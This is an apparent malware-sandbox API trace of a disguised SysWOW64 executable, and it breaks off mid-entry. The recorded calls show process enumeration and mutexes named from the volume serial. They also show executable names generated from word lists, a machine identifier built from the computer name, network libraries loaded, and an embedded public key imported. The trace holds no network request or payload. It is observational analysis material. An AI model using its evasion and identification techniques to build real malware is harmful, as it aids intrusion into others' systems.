GetCurrentProcessId () returned 0x6cc [0211.221] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0211.221] GetCurrentProcessId () returned 0x6cc [0211.221] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.221] GetCurrentProcessId () returned 0x6cc [0211.221] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x500, pcPriClassBase=13, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0211.222] GetCurrentProcessId () returned 0x6cc [0211.222] CloseHandle (hObject=0xac) returned 1 [0211.222] _snwprintf (in: _Dest=0x19fe60, _Count=0x40, _Format="PEM%X" | out: _Dest="PEM500") returned 6 [0211.222] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="PEM500") returned 0xac [0211.222] GetLastError () returned 0xb7 [0211.222] _snwprintf (in: _Dest=0x19fee0, _Count=0x40, _Format="PEE%X" | out: _Dest="PEE500") returned 6 [0211.222] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="PEE500") returned 0xb4 [0211.222] SetEvent (hEvent=0xb4) returned 1 [0211.224] CloseHandle (hObject=0xb4) returned 1 [0211.224] CloseHandle (hObject=0xac) returned 1 [0211.224] GetWindowsDirectoryW (in: lpBuffer=0x19fc90, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0211.224] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x415a04, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x415a04*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0211.224] _snwprintf (in: _Dest=0x19fe18, _Count=0x40, _Format="Global\\I%X" | out: _Dest="Global\\ID2CA4DEF") returned 16 [0211.224] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\ID2CA4DEF") returned 0xac [0211.224] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x0) returned 0x0 [0211.224] _snwprintf (in: _Dest=0x19fd88, _Count=0x40, _Format="Global\\M%X" | out: _Dest="Global\\MD2CA4DEF") returned 16 [0211.224] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\MD2CA4DEF") returned 0xb4 [0211.224] _snwprintf (in: _Dest=0x19fd88, _Count=0x40, _Format="Global\\E%X" | out: _Dest="Global\\ED2CA4DEF") returned 16 [0211.224] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="Global\\ED2CA4DEF") returned 0xb8 [0211.224] SignalObjectAndWait (hObjectToSignal=0xb8, hObjectToWaitOn=0xb4, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0211.224] ResetEvent (hEvent=0xb8) returned 1 [0211.224] ReleaseMutex (hMutex=0xac) returned 1 [0211.225] CloseHandle (hObject=0xac) returned 1 [0211.225] LoadLibraryW (lpLibFileName="user32.dll") returned 0x77310000 [0211.225] _snwprintf (in: _Dest=0x19fea8, _Count=0x40, _Format="LDWCN%X" | out: _Dest="LDWCND2CA4DEF") returned 13 [0211.225] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0211.225] RegisterClassExW (param_1=0x19ff48) returned 0xc048 [0211.225] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0211.225] CreateWindowExW (dwExStyle=0x0, lpClassName="LDWCND2CA4DEF", lpWindowName=0x0, dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x10028 [0211.227] GetTickCount () returned 0x9c8e [0211.227] SetTimer (hWnd=0x10028, nIDEvent=0x113450e, uElapse=0x3e8, lpTimerFunc=0x40cce0) returned 0x113450e [0211.227] GetTickCount () returned 0x9c8e [0211.227] GetTickCount () returned 0x9c8e [0211.227] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0212.254] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0212.254] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1134905 [0212.255] GetTickCount () returned 0xa085 [0212.255] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0212.255] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0213.031] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0213.031] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1 [0213.032] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0213.032] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0213.249] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0213.249] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1134ced [0213.249] GetTickCount () returned 0xa46d [0213.249] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0213.249] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0214.260] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0214.260] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11350e5 [0214.260] GetTickCount () returned 0xa865 [0214.260] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0214.261] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0215.276] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0215.276] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11354dd [0215.276] GetTickCount () returned 0xac5d [0215.276] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0215.276] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0216.297] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0216.297] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1136576 [0216.297] GetTickCount () returned 0xb054 [0216.297] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0216.297] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x74790000 [0216.314] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x4f9af8 [0216.317] CloseServiceHandle (hSCObject=0x4f9af8) returned 1 [0216.317] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4183f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0216.317] lstrlenA (lpString="not,ripple,svcs,serv,wab,shader,single,without,wcs,define,eap,culture,slide,zip,tmpl,mini,polic,panes,earcon,menus,detect,form,uuidgen,pnp,admin,tuip,avatar,started,dasmrc,alaska,guids,wfp,adam,wgx,lime,indexer,repl,dev,mapi,resw,daf,diag,iss,vsc,turned,neutral,sat,source,enroll,mfidl,idl,based,right,cbs,radar,avg,wordpad,metagen,mouse,iprop,mdmmcd,jersey,thunk,subs") returned 368 [0216.317] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x4181f0 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0216.319] _snwprintf (in: _Dest=0x417ee0, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned 38 [0216.319] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0216.320] CreateFileMappingW (hFile=0x19c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1a4 [0216.320] MapViewOfFile (hFileMappingObject=0x1a4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xb40000 [0216.320] GetFileSize (in: hFile=0x19c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e708 [0216.320] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0xb40000, Length=0x6e708) returned 0x69cea440 [0216.329] UnmapViewOfFile (lpBaseAddress=0xb40000) returned 1 [0216.332] CloseHandle (hObject=0x1a4) returned 1 [0216.332] CloseHandle (hObject=0x19c) returned 1 [0216.332] GetComputerNameW (in: lpBuffer=0x19fcc0, nSize=0x19fcf0 | out: lpBuffer="LHNIWSJ", nSize=0x19fcf0) returned 1 [0216.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="LHNIWSJ", cchWideChar=-1, lpMultiByteStr=0x19fce0, cbMultiByte=16, lpDefaultChar=0x4f6a70, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LHNIWSJ", lpUsedDefaultChar=0x0) returned 8 [0216.333] _snprintf (in: _Dest=0x4180e8, _Count=0x104, _Format="%s_%08X" | out: _Dest="LHNIWSJ_D2CA4DEF") returned 16 [0216.333] lstrlenA (lpString="steps,intel,cyan,sbs,emit,graph,work,fix,restore,select,bml,iprop,reports,balloon,hop,symbol,mddefw,cyrl,map,shims,iface,portto,ras,eula,pdh,sync,etl,wpc,dsm,cat,archive,pass,did,rule,compile,bundle,merged,keyand,android,compare,stg,mnu,lanes,dir,dmi,lime,route,tap,cch,msra,running,boost,jit,diala,fetch,tabbtn,sendand,vert,imp,the,clear,role,drv,readme") returned 354 [0216.333] _snwprintf (in: _Dest=0x19faec, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Windows\\SysWOW64\\eulacompile.exe") returned 35 [0216.333] DeleteFileW (lpFileName="C:\\Windows\\SysWOW64\\eulacompile.exe" (normalized: "c:\\windows\\syswow64\\eulacompile.exe")) returned 0 [0216.341] lstrcmpiW (lpString1="C:\\Windows\\SysWOW64\\indexerneutral.exe", lpString2="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned 0 [0216.343] GetTickCount () returned 0xb083 [0216.343] GetTickCount () returned 0xb083 [0216.343] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0216.343] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0217.296] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0217.296] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1135cbc [0217.297] GetTickCount () returned 0xb43c [0217.297] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0217.297] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0218.303] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0218.303] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11360b4 [0218.303] GetTickCount () returned 0xb834 [0218.303] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0218.303] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0219.319] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0219.319] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11364ab [0219.319] GetTickCount () returned 0xbc2b [0219.319] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0219.319] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0220.319] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0220.319] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113891c [0220.319] GetTickCount () returned 0xc013 [0220.319] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x77130000 [0220.324] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x74450000 [0222.043] LoadLibraryW (lpLibFileName="user32.dll") returned 0x77310000 [0222.043] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74160000 [0222.074] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x73f30000 [0223.491] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x73f20000 [0223.497] CryptAcquireContextW (in: phProv=0x417ca0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000040 | out: phProv=0x417ca0*=0x503230) returned 1 [0223.738] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x413430, cbEncoded=0x6a, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x19fd40, pcbStructInfo=0x19fd3c | out: pvStructInfo=0x19fd40, pcbStructInfo=0x19fd3c) returned 1 [0223.739] CryptImportKey (in: hProv=0x503230, pbData=0x501a88, dwDataLen=0x74, hPubKey=0x0, dwFlags=0x0, phKey=0x417ca4 | out: phKey=0x417ca4*=0x4fdaa8) returned 1 [0223.846] LocalFree (hMem=0x501a88) returned 0x0 [0223.846] CryptGenKey (in: hProv=0x503230, Algid=0x660e, dwFlags=0x1, phKey=0x417ca8 | out: phKey=0x417ca8*=0x4fd7e8) returned 1 [0223.846] CryptCreateHash (in: hProv=0x503230, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x417cac | out: phHash=0x417cac) returned 1 [0223.911] GetTickCount () returned 0xce0e [0223.911] GetTickCount () returned 0xce0e [0223.911] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0223.911] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0223.911] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0223.911] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113768e [0223.911] GetTickCount () returned 0xce0e [0223.911] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0223.911] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0224.343] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0224.343] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1137843 [0224.343] GetTickCount () returned 0xcfc3 [0224.343] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0224.343] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0225.352] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0225.352] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1137c3b [0225.352] GetTickCount () returned 0xd3bb [0225.352] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0225.352] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0226.360] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0226.360] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1138023 [0226.360] GetTickCount () returned 0xd7a3 [0226.360] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0226.360] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0227.367] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0227.367] DispatchMessageW (lpMsg=0x19ff2c) returned 0x113841a [0227.367] GetTickCount () returned 0xdb9a [0227.367] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0227.367] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0228.382] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0228.382] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1138812 [0228.382] GetTickCount () returned 0xdf92 [0228.382] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0228.382] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0229.382] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0229.382] DispatchMessageW (lpMsg=0x19ff2c) returned 0x0 [0229.382] GetTickCount () returned 0xe37a [0229.382] GetTickCount () returned 0xe37a [0229.382] GetTickCount () returned 0xe37a [0229.382] lstrlenA (lpString="LHNIWSJ_D2CA4DEF") returned 16 [0229.382] RtlGetVersion (in: lpVersionInformation=0x19fc38 | out: lpVersionInformation=0x19fc38*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0229.383] GetNativeSystemInfo (in: lpSystemInfo=0x19fc14 | out: lpSystemInfo=0x19fc14*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0229.383] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fc [0229.384] Process32FirstW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.384] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0229.385] GetCurrentProcessId () returned 0x6cc [0229.385] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0229.385] GetCurrentProcessId () returned 0x6cc [0229.385] GetCurrentProcessId () returned 0x6cc [0229.385] lstrcpyW (in: lpString1=0x504c7c, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0229.385] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.386] GetCurrentProcessId () returned 0x6cc [0229.386] GetCurrentProcessId () returned 0x6cc [0229.386] lstrcpyW (in: lpString1=0x504e94, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0229.386] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0229.386] GetCurrentProcessId () returned 0x6cc [0229.386] GetCurrentProcessId () returned 0x6cc [0229.386] lstrcpyW (in: lpString1=0x5050ac, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0229.386] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.387] GetCurrentProcessId () returned 0x6cc [0229.387] GetCurrentProcessId () returned 0x6cc [0229.387] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0229.387] GetCurrentProcessId () returned 0x6cc [0229.387] GetCurrentProcessId () returned 0x6cc [0229.387] lstrcpyW (in: lpString1=0x5052c4, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0229.387] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x190, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0229.388] GetCurrentProcessId () returned 0x6cc [0229.388] GetCurrentProcessId () returned 0x6cc [0229.388] lstrcpyW (in: lpString1=0x5054dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0229.388] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x190, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0229.388] GetCurrentProcessId () returned 0x6cc [0229.388] GetCurrentProcessId () returned 0x6cc [0229.388] lstrcpyW (in: lpString1=0x5056f4, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0229.388] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.389] GetCurrentProcessId () returned 0x6cc [0229.389] GetCurrentProcessId () returned 0x6cc [0229.389] lstrcpyW (in: lpString1=0x50590c, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0229.389] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.389] GetCurrentProcessId () returned 0x6cc [0229.389] GetCurrentProcessId () returned 0x6cc [0229.389] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0229.390] GetCurrentProcessId () returned 0x6cc [0229.390] GetCurrentProcessId () returned 0x6cc [0229.390] lstrcpyW (in: lpString1=0x505b24, lpString2="LogonUI.exe" | out: lpString1="LogonUI.exe") returned="LogonUI.exe" [0229.390] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0229.390] GetCurrentProcessId () returned 0x6cc [0229.390] GetCurrentProcessId () returned 0x6cc [0229.390] lstrcpyW (in: lpString1=0x505d3c, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0229.390] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.391] GetCurrentProcessId () returned 0x6cc [0229.391] GetCurrentProcessId () returned 0x6cc [0229.391] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.391] GetCurrentProcessId () returned 0x6cc [0229.391] GetCurrentProcessId () returned 0x6cc [0229.391] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.392] GetCurrentProcessId () returned 0x6cc [0229.392] GetCurrentProcessId () returned 0x6cc [0229.392] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.392] GetCurrentProcessId () returned 0x6cc [0229.392] GetCurrentProcessId () returned 0x6cc [0229.392] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x388, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.393] GetCurrentProcessId () returned 0x6cc [0229.393] GetCurrentProcessId () returned 0x6cc [0229.393] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x314, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0229.393] GetCurrentProcessId () returned 0x6cc [0229.393] GetCurrentProcessId () returned 0x6cc [0229.394] lstrcpyW (in: lpString1=0x505f54, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0229.394] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.394] GetCurrentProcessId () returned 0x6cc [0229.394] GetCurrentProcessId () returned 0x6cc [0229.394] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x404, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, 